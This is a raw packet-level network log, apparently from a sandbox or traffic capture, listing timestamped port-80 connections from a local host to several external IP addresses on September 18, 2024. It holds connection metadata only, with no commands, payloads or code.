                                                        Sep 18, 2024 16:18:50.366051912 CEST5362380192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:51.385931969 CEST5362480192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:51.391019106 CEST8053624172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:51.391112089 CEST5362480192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:51.405745983 CEST5362480192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:51.412128925 CEST8053624172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:52.296257973 CEST8053624172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:52.296281099 CEST8053624172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:52.296427965 CEST5362480192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:52.912422895 CEST5362480192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:53.934853077 CEST5362580192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:53.939867020 CEST8053625172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:53.939969063 CEST5362580192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:54.002728939 CEST5362580192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:54.007713079 CEST8053625172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:54.007736921 CEST8053625172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:54.881388903 CEST8053625172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:54.881623030 CEST8053625172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:54.881726980 CEST5362580192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:55.505774975 CEST5362580192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:56.523998976 CEST5362680192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:56.529247046 CEST8053626172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:56.529335976 CEST5362680192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:56.536655903 CEST5362680192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:56.541771889 CEST8053626172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:57.440395117 CEST8053626172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:57.440501928 CEST8053626172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:57.440578938 CEST5362680192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:57.443357944 CEST5362680192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:57.448424101 CEST8053626172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:19:02.579098940 CEST5362780192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:02.583975077 CEST8053627217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:02.584624052 CEST5362780192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:02.632920980 CEST5362780192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:02.637808084 CEST8053627217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:03.210390091 CEST8053627217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:03.210448027 CEST8053627217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:03.216710091 CEST5362780192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:04.147762060 CEST5362780192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:05.164766073 CEST5362880192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:05.170228958 CEST8053628217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:05.170329094 CEST5362880192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:05.179414034 CEST5362880192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:05.184372902 CEST8053628217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:05.791811943 CEST8053628217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:05.792203903 CEST8053628217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:05.792242050 CEST5362880192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:06.695409060 CEST5362880192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:07.712965965 CEST5362980192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:07.717854023 CEST8053629217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:07.717933893 CEST5362980192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:07.730180979 CEST5362980192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:07.735049963 CEST8053629217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:07.735116005 CEST8053629217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:08.345907927 CEST8053629217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:08.346137047 CEST8053629217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:08.348794937 CEST5362980192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:09.244714975 CEST5362980192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:10.260694981 CEST5363080192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:10.266959906 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:10.272706985 CEST5363080192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:10.276715040 CEST5363080192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:10.281507969 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:11.054832935 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:11.054877996 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:11.054887056 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:11.054896116 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:11.054997921 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:11.055032969 CEST5363080192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:11.055234909 CEST5363080192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:11.060703039 CEST5363080192.168.2.5217.70.184.50
                                                        Sep 18, 2024 16:19:11.065515995 CEST8053630217.70.184.50192.168.2.5
                                                        Sep 18, 2024 16:19:16.761377096 CEST5363180192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:16.768781900 CEST805363163.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:16.768899918 CEST5363180192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:16.778733969 CEST5363180192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:16.783554077 CEST805363163.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:17.368331909 CEST805363163.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:17.368416071 CEST805363163.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:17.368469000 CEST5363180192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:18.288793087 CEST5363180192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:19.306257963 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:19.311229944 CEST805363263.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:19.311295033 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:19.324834108 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:19.329634905 CEST805363263.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:19.914203882 CEST805363263.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:19.914726019 CEST805363263.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:19.914771080 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:20.836221933 CEST5363280192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.852466106 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.857481956 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:21.857561111 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.869117975 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:21.874005079 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:21.874131918 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:22.515882015 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:22.516226053 CEST805363363.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:22.516388893 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:23.380784988 CEST5363380192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.400724888 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.405807972 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:24.407202959 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.414429903 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:24.420156002 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:25.013453007 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:25.013533115 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:25.013614893 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:25.016638994 CEST5363480192.168.2.563.250.47.40
                                                        Sep 18, 2024 16:19:25.021558046 CEST805363463.250.47.40192.168.2.5
                                                        Sep 18, 2024 16:19:30.043042898 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:30.047926903 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.048007011 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:30.063503981 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:30.068375111 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.688004971 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.688083887 CEST805363591.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:30.690958977 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:31.568413973 CEST5363580192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.586378098 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.591433048 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:32.595015049 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.606756926 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:32.611654043 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:33.214298964 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:33.214380026 CEST805363691.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:33.214822054 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:34.115153074 CEST5363680192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.134527922 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.139621019 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.139744043 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.149058104 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.153907061 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.154004097 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871685982 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871716976 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871774912 CEST805363791.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:35.871778965 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:35.871818066 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:36.662075043 CEST5363780192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.680315971 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.685307026 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:37.685390949 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.691410065 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:37.696289062 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:38.348726988 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:38.348876953 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:38.348984957 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:38.351818085 CEST5363880192.168.2.591.184.0.200
                                                        Sep 18, 2024 16:19:38.356750965 CEST805363891.184.0.200192.168.2.5
                                                        Sep 18, 2024 16:19:43.384386063 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:43.389367104 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:43.389440060 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:43.398394108 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:43.403422117 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:43.847429037 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:43.847493887 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:44.912035942 CEST5363980192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:44.917315006 CEST805363913.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:45.930282116 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:45.935204029 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:45.935408115 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:45.944848061 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:45.949695110 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:46.397588968 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:46.397677898 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:47.462546110 CEST5364080192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:47.467430115 CEST805364013.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.476866007 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:48.481949091 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.482036114 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:48.491103888 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:48.496100903 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.496128082 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.945964098 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:48.946029902 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:50.006422043 CEST5364180192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:50.011456966 CEST805364113.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.024188042 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.029234886 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.029321909 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.036479950 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.044487953 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.502353907 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.502444983 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:19:51.502607107 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.504837036 CEST5364280192.168.2.513.248.169.48
                                                        Sep 18, 2024 16:19:51.510854959 CEST805364213.248.169.48192.168.2.5
                                                        Sep 18, 2024 16:20:11.017110109 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:11.022069931 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.022146940 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:11.031505108 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:11.036432028 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.912388086 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.912781000 CEST805364743.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:11.912872076 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:12.537194967 CEST5364780192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.555135965 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.618979931 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:13.619347095 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.630875111 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:13.664886951 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:14.670156956 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:14.674838066 CEST805364843.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:14.674892902 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:15.130932093 CEST5364880192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.153265953 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.324650049 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:16.324779034 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.333942890 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:16.340408087 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:16.340435028 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:17.275325060 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:17.276339054 CEST805364943.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:17.276408911 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:17.849606037 CEST5364980192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.867784023 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.904093027 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:18.904182911 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.911250114 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:18.941479921 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:19.922276974 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:19.922617912 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:19.922705889 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:19.925065041 CEST5365080192.168.2.543.242.202.169
                                                        Sep 18, 2024 16:20:19.945262909 CEST805365043.242.202.169192.168.2.5
                                                        Sep 18, 2024 16:20:26.211992979 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:26.235001087 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.235286951 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:26.244155884 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:26.249125957 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.989557028 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.995934963 CEST8053651103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:26.996004105 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:27.756520987 CEST5365180192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.774463892 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.780822039 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:28.780905008 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.795279980 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:28.800204039 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:29.401736975 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:29.401801109 CEST8053652103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:29.401854038 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:30.302731991 CEST5365280192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.322356939 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.608978987 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:31.609428883 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.624845982 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:31.630877972 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:31.632890940 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.376797915 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.376816034 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.376830101 CEST8053653103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:32.377082109 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:33.130886078 CEST5365380192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.150558949 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.155520916 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.155930996 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.163423061 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.168348074 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.793801069 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.796257019 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.796273947 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:34.796370983 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.796401978 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.802194118 CEST5365480192.168.2.5103.224.182.242
                                                        Sep 18, 2024 16:20:34.810837030 CEST8053654103.224.182.242192.168.2.5
                                                        Sep 18, 2024 16:20:39.928849936 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:39.933770895 CEST805365585.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:39.933927059 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:39.942718983 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:39.947647095 CEST805365585.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:41.459513903 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:41.464648962 CEST805365585.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:41.467602968 CEST5365580192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.477899075 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.483023882 CEST805365685.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:42.483093977 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.499346972 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:42.510060072 CEST805365685.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:44.006797075 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:44.012448072 CEST805365685.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:44.012590885 CEST5365680192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.025206089 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.030112028 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:45.030199051 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.041285038 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:45.046180010 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:45.046451092 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:46.552932024 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:46.784935951 CEST805365785.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:46.785026073 CEST5365780192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.571820021 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.576678038 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:47.576941013 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.583436012 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:47.588602066 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:48.478960991 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:48.479137897 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:48.479195118 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:48.485137939 CEST5365880192.168.2.585.159.66.93
                                                        Sep 18, 2024 16:20:48.490011930 CEST805365885.159.66.93192.168.2.5
                                                        Sep 18, 2024 16:20:53.546108007 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:53.551110983 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:53.552957058 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:53.578528881 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:53.584059000 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781192064 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781241894 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781275034 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781313896 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:54.781727076 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781759024 CEST8053659188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:54.781918049 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:54.781918049 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:55.084096909 CEST5365980192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:56.103032112 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:56.108400106 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:56.111476898 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:56.120330095 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:56.125272989 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:57.207595110 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:57.207663059 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:57.207693100 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:57.207720041 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:57.207971096 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:57.208023071 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:57.208923101 CEST8053660188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:57.208986044 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:57.631601095 CEST5366080192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:58.667607069 CEST5366180192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:58.672792912 CEST8053661188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:58.672888994 CEST5366180192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:58.697415113 CEST5366180192.168.2.5188.114.97.3
                                                        Sep 18, 2024 16:20:58.702455997 CEST8053661188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:58.703028917 CEST8053661188.114.97.3192.168.2.5
                                                        Sep 18, 2024 16:20:59.707585096 CEST8053661188.114.97.3192.168.2.5
